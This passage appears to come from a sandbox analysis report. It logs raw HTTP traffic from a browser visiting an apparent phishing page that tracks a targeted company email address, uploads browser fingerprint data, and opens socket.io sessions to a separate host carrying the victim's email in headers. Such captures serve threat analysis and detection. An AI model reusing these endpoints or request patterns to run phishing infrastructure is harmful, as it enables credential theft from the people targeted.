                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Origin: https://www.oyabarista.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:49 UTC845INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:41:49 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 1
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cache-control: no-store
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=olNUDPCgXkQo2GyddI7RqrWwyQP63FIogLAH5atLJJHe6PUoNnnek8jgPodKVSrwLV9M9ggA4f%2Bxv7gwkj0lj3RG%2FQ%2BKS1UdiqBfEsb7IInfVQ2QiXwyVhvQF855YhVTu4KsWQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4eb71d03624e-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=84417&min_rtt=84386&rtt_var=17847&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1264&delivery_rate=36184&cwnd=252&unsent_bytes=0&cid=89a2965cba40b290&ts=726&x=0"
                                                        2025-03-27 13:41:49 UTC1INData Raw: 31
                                                        Data Ascii: 1


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        43192.168.2.549796172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:49 UTC450OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrcTV&sid=t010Hy5o6-DrcLMyAAe8 HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:49 UTC795INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 27 Mar 2025 13:41:49 GMT
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vbn3zIdt3WsukcR3ZqAylMKCg1vGF0Y%2BxQI1jqvBXaxZ8PkqklniE4Yvij0atiz76kLxVxmb3cVXn3lOREQjqWnmUEThMt8ce%2FXccUxifQOukMHszpBqyyVVh5exhlg14hG2sA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4eb9fe0e4fb3-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=84855&min_rtt=84504&rtt_var=18145&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1022&delivery_rate=36142&cwnd=252&unsent_bytes=0&cid=3e508c655a74aec3&ts=265&x=0"
                                                        2025-03-27 13:41:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        44192.168.2.549785104.21.70.2324436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:49 UTC1021OUTPOST /n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.com HTTP/1.1
                                                        Host: www.oyabarista.com
                                                        Connection: keep-alive
                                                        Content-Length: 147028
                                                        Cache-Control: max-age=0
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Origin: https://www.oyabarista.com
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-Dest: document
                                                        Referer: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.com
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:49 UTC16384OUTData Raw: 64 61 74 61 3d 25 37 42 25 32 32 73 63 72 65 65 6e 25 32 32 25 33 41 25 37 42 25 32 32 61 76 61 69 6c 57 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 61 76 61 69 6c 48 65 69 67 68 74 25 32 32 25 33 41 39 38 34 25 32 43 25 32 32 77 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 68 65 69 67 68 74 25 32 32 25 33 41 31 30 32 34 25 32 43 25 32 32 63 6f 6c 6f 72 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 70 69 78 65 6c 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 61 76 61 69 6c 4c 65 66 74 25 32 32 25 33 41 30 25 32 43 25 32 32 61 76 61 69 6c 54 6f 70 25 32 32 25 33 41 30 25 32 43 25 32 32 6f 72 69 65 6e 74 61 74 69 6f 6e 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 53 63 72 65 65 6e 4f 72 69 65
                                                        Data Ascii: data=%7B%22screen%22%3A%7B%22availWidth%22%3A1280%2C%22availHeight%22%3A984%2C%22width%22%3A1280%2C%22height%22%3A1024%2C%22colorDepth%22%3A24%2C%22pixelDepth%22%3A24%2C%22availLeft%22%3A0%2C%22availTop%22%3A0%2C%22orientation%22%3A%22%5Bobject+ScreenOrie
                                                        2025-03-27 13:41:49 UTC16384OUTData Raw: 32 43 25 32 32 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 58 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 58 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 38 25 32 39 2b 25 37 42
                                                        Data Ascii: 2C%22XMLHttpRequest%22%3A%22function+XMLHttpRequest%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22XMLDocument%22%3A%22function+XMLDocument%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22WritableStreamDefaultWriter%22%3A%22function+WritableStreamDefaultWriter%28%29+%7B
                                                        2025-03-27 13:41:49 UTC16384OUTData Raw: 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 53 56 47 41 6e 69 6d 61 74 65 64 53 74 72 69 6e 67 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 53 56 47 41 6e 69 6d 61 74 65 64 53 74 72 69 6e 67 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 53 56 47 41 6e 69 6d 61 74 65 64 52 65 63 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 53 56 47 41 6e 69 6d 61 74 65 64 52 65 63 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 53 56 47 41 6e 69 6d 61 74 65 64 50 72 65 73 65 72 76 65 41 73 70 65 63 74 52 61 74 69 6f 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69
                                                        Data Ascii: Bnative+code%5D+%7D%22%2C%22SVGAnimatedString%22%3A%22function+SVGAnimatedString%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22SVGAnimatedRect%22%3A%22function+SVGAnimatedRect%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22SVGAnimatedPreserveAspectRatio%22%3A%22functi
                                                        2025-03-27 13:41:49 UTC16384OUTData Raw: 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 54 61 62 6c 65 43 6f 6c 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 54 61 62 6c 65 43 6f 6c 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 54 61 62 6c 65 43 65 6c 6c 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 54 61 62 6c 65 43 65 6c 6c 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 54 61 62 6c 65 43 61 70 74 69 6f 6e 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 54 61 62
                                                        Data Ascii: 7D%22%2C%22HTMLTableColElement%22%3A%22function+HTMLTableColElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLTableCellElement%22%3A%22function+HTMLTableCellElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLTableCaptionElement%22%3A%22function+HTMLTab
                                                        2025-03-27 13:41:49 UTC16384OUTData Raw: 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 43 53 53 4c 61 79 65 72 42 6c 6f 63 6b 52 75 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 43 53 53 4c 61 79 65 72 42 6c 6f 63 6b 52 75 6c 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 43 53 53 4b 65 79 77 6f 72 64 56 61 6c 75 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 43 53 53 4b 65 79 77 6f 72 64 56 61 6c 75 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 43 53 53 4b 65 79 66 72 61 6d 65 73 52 75 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 43 53 53 4b 65 79 66
                                                        Data Ascii: B+%5Bnative+code%5D+%7D%22%2C%22CSSLayerBlockRule%22%3A%22function+CSSLayerBlockRule%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22CSSKeywordValue%22%3A%22function+CSSKeywordValue%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22CSSKeyframesRule%22%3A%22function+CSSKeyf
                                                        2025-03-27 13:41:49 UTC16384OUTData Raw: 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 46 69 6c 65 53 79 73 74 65 6d 46 69 6c 65 48 61 6e 64 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 46 69 6c 65 53 79 73 74 65 6d 46 69 6c 65 48 61 6e 64 6c 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 46 69 6c 65 53 79 73 74 65 6d 48 61 6e 64 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 46 69 6c 65 53 79 73 74 65 6d 48 61 6e 64 6c 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 46 69 6c 65 53 79 73 74 65 6d 57 72 69 74 61 62 6c 65 46 69 6c 65 53 74
                                                        Data Ascii: %28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22FileSystemFileHandle%22%3A%22function+FileSystemFileHandle%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22FileSystemHandle%22%3A%22function+FileSystemHandle%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22FileSystemWritableFileSt
                                                        2025-03-27 13:41:49 UTC16384OUTData Raw: 32 25 32 43 25 32 32 54 61 73 6b 53 69 67 6e 61 6c 25 32 32 25 32 43 25 32 32 54 61 73 6b 50 72 69 6f 72 69 74 79 43 68 61 6e 67 65 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 54 61 73 6b 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 32 25 32 43 25 32 32 54 61 73 6b 41 74 74 72 69 62 75 74 69 6f 6e 54 69 6d 69 6e 67 25 32 32 25 32 43 25 32 32 53 79 6e 63 4d 61 6e 61 67 65 72 25 32 32 25 32 43 25 32 32 53 75 62 6d 69 74 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 53 68 65 65 74 4c 69 73 74 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 53 68 65 65 74 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 50 72 6f 70 65 72 74 79 4d 61 70 52 65 61 64 4f 6e 6c 79 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 50 72 6f 70 65 72 74 79 4d 61 70 25 32 32 25 32 43 25 32 32 53 74 6f 72
                                                        Data Ascii: 2%2C%22TaskSignal%22%2C%22TaskPriorityChangeEvent%22%2C%22TaskController%22%2C%22TaskAttributionTiming%22%2C%22SyncManager%22%2C%22SubmitEvent%22%2C%22StyleSheetList%22%2C%22StyleSheet%22%2C%22StylePropertyMapReadOnly%22%2C%22StylePropertyMap%22%2C%22Stor
                                                        2025-03-27 13:41:49 UTC16384OUTData Raw: 32 63 6c 6f 73 65 25 32 32 25 32 43 25 32 32 63 6f 6e 66 69 72 6d 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 49 6d 61 67 65 42 69 74 6d 61 70 25 32 32 25 32 43 25 32 32 66 65 74 63 68 25 32 32 25 32 43 25 32 32 66 69 6e 64 25 32 32 25 32 43 25 32 32 66 6f 63 75 73 25 32 32 25 32 43 25 32 32 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 25 32 32 25 32 43 25 32 32 67 65 74 53 65 6c 65 63 74 69 6f 6e 25 32 32 25 32 43 25 32 32 6d 61 74 63 68 4d 65 64 69 61 25 32 32 25 32 43 25 32 32 6d 6f 76 65 42 79 25 32 32 25 32 43 25 32 32 6d 6f 76 65 54 6f 25 32 32 25 32 43 25 32 32 6f 70 65 6e 25 32 32 25 32 43 25 32 32 70 6f 73 74 4d 65 73 73 61 67 65 25 32 32 25 32 43 25 32 32 70 72 69 6e 74 25 32 32 25 32 43 25 32 32 70 72 6f 6d 70 74 25 32 32 25 32 43 25 32 32
                                                        Data Ascii: 2close%22%2C%22confirm%22%2C%22createImageBitmap%22%2C%22fetch%22%2C%22find%22%2C%22focus%22%2C%22getComputedStyle%22%2C%22getSelection%22%2C%22matchMedia%22%2C%22moveBy%22%2C%22moveTo%22%2C%22open%22%2C%22postMessage%22%2C%22print%22%2C%22prompt%22%2C%22
                                                        2025-03-27 13:41:49 UTC15956OUTData Raw: 53 74 61 6d 70 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 74 69 6d 65 53 74 61 6d 70 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 6f 6e 74 65 78 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 6f 6e 74 65 78 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 54 61 73 6b 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 54 61 73 6b 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 6d 65 6d 6f 72 79 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 4d 65 6d 6f 72
                                                        Data Ascii: Stamp%22%3A%22function+timeStamp%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22context%22%3A%22function+context%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createTask%22%3A%22function+createTask%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22memory%22%3A%22%5Bobject+Memor


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        45192.168.2.549798172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:50 UTC450OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrcTW&sid=t010Hy5o6-DrcLMyAAe8 HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:50 UTC827INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 27 Mar 2025 13:41:50 GMT
                                                        Content-Type: application/json
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HF41bli%2BX9cDflLyNBmnuq65m2TyMVMNZdd05UIycGLqxPuvIKMqqZPOUe0RxtEU9esL%2FMqQ3WPBSXExlqA6dfEoltdjVAWvuAs6CS000k6ajQkDqJhAYw2Ymdwa89sHxa5Dtg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4ebceffd7611-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83897&min_rtt=83876&rtt_var=17727&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1022&delivery_rate=36411&cwnd=252&unsent_bytes=0&cid=75ffffa11eb32052&ts=266&x=0"
                                                        2025-03-27 13:41:50 UTC47INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a
                                                        Data Ascii: 29{"code":1,"message":"Session ID unknown"}
                                                        2025-03-27 13:41:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        46192.168.2.549799172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:50 UTC567OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PNNrc-m HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Access-Control-Request-Method: GET
                                                        Access-Control-Request-Headers: auth_uid,session_email
                                                        Origin: https://www.oyabarista.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:51 UTC375INHTTP/1.1 204 No Content
                                                        Date: Thu, 27 Mar 2025 13:41:51 GMT
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                        Vary: Access-Control-Request-Headers
                                                        Access-Control-Allow-Headers: auth_uid,session_email
                                                        Cf-Cache-Status: DYNAMIC
                                                        Server: cloudflare
                                                        CF-RAY: 926f4ec1df478c15-EWR
                                                        alt-svc: h3=":443"; ma=86400


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        47192.168.2.549800172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:51 UTC667OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrc-m HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Auth_UID: USER04032025U29030403
                                                        Session_Email: info@kostal.com
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Origin: https://www.oyabarista.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:51 UTC851INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:41:51 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 118
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cache-control: no-store
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EQ9DXQK4XjS1qeR5ulD1FFYUC%2BXhU7ksBGyR33%2BnyjvBCcOVkTy1f4I6YELYyzJeg8yqTrVZ2QkybX01GiGy%2FJMFAA2crH2hdokwzvG8fahoz%2FVfKku6vxnWK2h46rawhlVT%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4ec4da3dc327-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83602&min_rtt=83549&rtt_var=17706&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1239&delivery_rate=36508&cwnd=252&unsent_bytes=0&cid=7bdce106dae50e86&ts=306&x=0"
                                                        2025-03-27 13:41:51 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 63 44 63 71 5f 36 6f 69 50 70 45 4b 78 48 77 35 41 41 65 5f 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                        Data Ascii: 0{"sid":"cDcq_6oiPpEKxHw5AAe_","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        48192.168.2.549803172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:51 UTC593OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PNNrdFJ&sid=cDcq_6oiPpEKxHw5AAe_ HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Access-Control-Request-Method: POST
                                                        Access-Control-Request-Headers: auth_uid,session_email
                                                        Origin: https://www.oyabarista.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:52 UTC947INHTTP/1.1 204 No Content
                                                        Date: Thu, 27 Mar 2025 13:41:52 GMT
                                                        Content-Length: 0
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                        Vary: Access-Control-Request-Headers
                                                        Access-Control-Allow-Headers: auth_uid,session_email
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FTxL6P7ZIKQil%2BzI0QYDytK%2FiWq0d7mZluzlawSKQSAX%2FPHf%2BcR26syDyp5GtSDRKPEd7bqDL4oJpD0i5hS1pGArs3akisc3wm2r1elee0SCzmB8Kvkkt%2BqwECmMcnfV8cmA9Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4ec7d8884f4e-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83818&min_rtt=83806&rtt_var=17698&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1165&delivery_rate=36457&cwnd=252&unsent_bytes=0&cid=ac03708f350380de&ts=306&x=0"


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        49192.168.2.549802172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:51 UTC566OUTGET /socket.io/?EIO=4&transport=websocket&sid=cDcq_6oiPpEKxHw5AAe_ HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: Upgrade
                                                        Pragma: no-cache
                                                        Cache-Control: no-cache
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Upgrade: websocket
                                                        Origin: https://www.oyabarista.com
                                                        Sec-WebSocket-Version: 13
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Sec-WebSocket-Key: /O64MXq9NSX1GjEUOYIrXg==
